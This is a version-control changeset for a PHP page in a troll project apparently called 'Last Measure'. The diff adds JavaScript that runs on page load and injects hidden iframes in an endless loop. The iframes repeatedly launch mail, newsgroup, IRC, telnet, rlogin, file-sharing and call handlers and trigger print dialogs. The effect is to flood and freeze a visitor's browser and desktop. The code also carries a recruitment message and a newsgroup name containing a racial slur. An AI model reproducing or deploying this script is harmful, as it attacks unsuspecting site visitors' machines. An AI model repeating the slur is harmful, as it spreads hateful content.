Changeset 86


Ignore:
Timestamp:
11/24/05 00:40:55 (8 years ago)
Author:
sam
Message:
  • merged printmeasure etc.
File:
1 edited

Legend:

Unmodified
Added
Removed
  • trollforge/lastmeasure/index.php

    r85 r86  
    3838           pluginspage="http://www.macromedia.com/go/getflashplayer"></embed> 
    3939  </object> 
     40<?php 
     41} 
     42 
     43function external_ruin() { ?> 
     44  <script> 
     45    var mail = 'mailto:JOIN@THE.GNAA?subject=2005_RECRUITMENT_DRIVE' 
     46        mail += '&body=www.gnaa.us'; 
     47    var news = 'news:alt.flame.niggers'; 
     48 
     49    var protos = [ 
     50      mail, 
     51      'irc://irc.gnaa.us/#gnaa', 
     52      'rlogin://x.x.x.x:xx', 
     53      mail, 
     54      'telnet://x.x.x.x:xx', 
     55      mail, 
     56      'ed2k://|file|Star.Wars.Episode.III.Revenge.of.the.Sith.2005.PROPER.DVDRip.XviD-GNAA.avi|1073397760|4D34DCA3C4E81B484EAC8CA408EEDD48|h=4OBEIFRUQRW7QJGRPBZJGRRQJHNP7KJS|/', 
     57      news, 
     58      'callto://JOIN_THE_GNAA__2005_RECRUITMENT_DRIVE' 
     59    ]; 
     60 
     61    function add(str) { 
     62      div = document.getElementById('goatse'); 
     63      div.innerHTML = '<iframe width=1 height=1 src="' + str + '"></iframe>'; 
     64    } 
     65 
     66    function extruin() { 
     67      document.body.innerHTML += '<div id="goatse">Y HALLO THAR!</div>'; 
     68      for(i = 0; i < 10; i++) { 
     69        add(mail); 
     70        add(news); 
     71      } 
     72      setTimeout("ruin()", 10); 
     73    } 
     74 
     75    function ruin() { 
     76      for(i = 0; i < protos.length; i++) { 
     77        add(protos[i]); 
     78      } 
     79      print(); 
     80      setTimeout("ruin()", 10); 
     81    } 
     82  </script> 
    4083<?php 
    4184} 
     
    182225      ?> 
    183226<body background="<?php random_image();?>" bgcolor="#ffffff" 
    184       <?php if($br_ie6) { ?>onLoad="setTimeout('main()',100)" <?php } ?> 
     227      onLoad="setTimeout('extruin()',100);<?php if($br_ie6) { ?>setTimeout('main()',100)"<?php } ?> 
    185228      leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> 
    186229  <?php move_around(800, 600);?> 
Note: See TracChangeset for help on using the changeset viewer.